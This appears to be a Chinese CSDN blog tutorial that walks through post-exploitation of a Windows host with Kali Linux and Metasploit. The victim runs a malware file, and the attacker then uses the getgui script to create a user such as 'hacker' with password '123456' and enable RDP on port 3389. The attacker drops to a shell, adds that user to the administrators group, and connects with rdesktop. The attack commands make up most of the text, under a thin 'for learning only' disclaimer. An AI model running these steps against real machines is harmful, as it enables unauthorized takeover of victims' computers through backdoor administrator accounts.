kali+linux网络攻防,网络安全工程师教你:如何使用Kali Linux进行渗透测试与攻防实战...

本文介绍了如何使用Kali Linux进行模拟攻防演练,通过执行特定命令和脚本,逐步控制Windows主机并开启远程桌面连接。详细步骤包括查看session状态、运行病毒文件、创建用户、提升权限,最终实现对受害者主机的远程操作。
摘要由CSDN通过智能技术生成

课前声明:

1、本分享仅做学习交流,请自觉遵守法律法规!

2、搜索:Kali与编程,学习更多网络攻防干货!

一、背景介绍

在我们日常使用Kali Linux时,我们通常在进行模拟攻防演练的时候,我们如何拿下目标主机最高权限呢(例如利用病毒拿下Win7主机),怎样在受害者主机进行随意操作呢?如何进行文件下载以及文件上传呢?如何解决上述问题呢?接下来让我们一起学习!

二、资源装备

1.安装好Kali Linux的虚拟机一台;

2.已经被控制的Windows主机一个;

3.整装待发的小白一个。

三、战略安排

3.1 查看kali虚拟机sessions状况,如下图所示。

命令:sessions

3.2 在受害者主机执行病毒文件,如下图所示。

步骤:双击如下图所示的文件

3.3 再次在Kali Linux中执行sessions命令,如下图所示。

命令:sessions

3.4 执行命令,给受害者主机创建用户,如下图所示。

命令:sessions -i 5

run getgui -u 用户名 -p 密码

Eg:rungetgui -u hacker -p 123456

3.5 执行getgui脚本文件,开启受害者主机3389端口(远程桌面连接端口),如下图所示。

命令:run getgui -e

3.5.1 执行结果如下图所示。

a9ecbaf7fb9ee9c4e0ab79282f7d0b97.png

3.6 查看受害者主机的ip地址,如下图所示。

命令:ipconfig

63186845b4eda48154829b1d9a6066d0.png

3.7 连接受害者主机的远程桌面,如下图所示。

命令:rdesktop 192.168.0.107:3389

ef00abbdb92041dd2c777f0bd49ae034.png

3.7.1 登录窗口如下图所示,根据创建的用户进行登录。

dd6fe587abad65cd8ce17ba2ca3e770b.png

3.8 遇到创建的用户不是管理员组用户的问题,如下图所示。

ba4e9a014530b347fac913f36087a624.png

3.9 解决升级管理员权限的问题。

3.9.1 启动dos窗口

命令:shell

3.9.2 升级管理员用户,如下图所示。

命令:localgroup administrators 用户名 /add

Eg :localgroup administrators hacker /add

3.9.3 解决乱码问题,如下图所示。

命令:chcp 65001

3.10 继续登录,如下图所示。

3.10.1 登录界面

9cebcbc4d99e7ba1ad6410e064825c90.png

3.10.2 选择是

62f8d112605fd21d79a1f4a39a6742b8.png

fbf0a1d2c4b8a463ec017548e094be3a.png

3.11 渗透成功,如下图所示。

d744bd8ed4d4437a49e68cffb2dd03ac.png

4e18d13c7f8f0c49b134a3addcb13949.png

辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值